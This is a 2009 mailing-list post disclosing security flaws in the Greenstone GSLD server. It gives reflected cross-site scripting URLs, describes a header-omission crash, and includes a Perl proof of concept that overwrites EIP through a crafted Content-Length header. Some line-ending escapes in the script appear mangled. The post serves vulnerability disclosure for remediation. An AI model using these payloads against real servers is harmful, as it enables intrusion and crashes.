[greenstone-users] Security Issues in GSLD

From Jeremy Brown
DateMon Sep 14 16:11:57 2009
Subject [greenstone-users] Security Issues in GSLD
Since I was told I could post this information to this list, I will
continue on this route for remediation of security issues in
Greenstone, particularly the GLSD.

Cross Site Scripting

http://10.10.10.100/gsdl?e=p-000-00-off-demo&a=q&h=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E
http://10.10.10.100/gsdl?e=p-000-00-off-demo&a=q&q=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E

Crash when not sending headers (for example: GET / HTTP/1.1r r or
even just )

GSLD Memory corruption @ content-length.. user can specify EIP in
decimal notation, Proof of Concept provided:

[gsld_mc.pl]
#!/usr/bin/perl
# gsld_mc.pl
# Greenstone 2.81 GLSD Remote Memory Corruption 0day PoC
# Jeremy Brown 2009

use IO::Socket;

$target = "10.10.10.100";
$port = 80;

$eip = 2882395322; # 0xabcddcba

$payload = "GET / HTTP/1.1r " . "Host: " . $target . "r " .
"Referrer: " . "r " . "Content-Length: " . $eip . "r " .
"r r ";

$sock = IO::Socket::INET->new(Proto=>"tcp",
PeerHost=>$target,
PeerPort=>$port)
or die "Error: $target:$port ";

$sock->send($payload);
$sock->recv($recvbuf, 512);

close($sock);
[/gsld_mc.pl]

Thank you,

Jeremy